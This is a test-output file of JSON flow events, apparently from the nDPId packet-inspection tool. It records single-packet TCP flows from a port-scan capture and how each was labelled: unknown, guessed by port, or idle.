+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1612,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6692,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"AFP","breed":"Acceptable","category":"DataTransfer"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":548,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060336,"flow_last_seen":1278275060336,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1279,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":41511,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":960,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059961,"flow_last_seen":1278275059961,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} 
+00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057678,"flow_last_seen":1278275057678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1315,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2602,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":290,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1624,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060902,"flow_last_seen":1278275060902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00635{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTSP","breed":"Fun","category":"Media"}} +00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":554,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":989,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":330,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6699,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1703,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":18988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"OSPF","breed":"Acceptable","category":"Network"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1058,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2604,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} +00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057742,"flow_last_seen":1278275057742,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"BGP","breed":"Acceptable","category":"Network"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057886,"flow_last_seen":1278275057886,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2605,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1840,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061206,"flow_last_seen":1278275061206,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1921,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1293,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 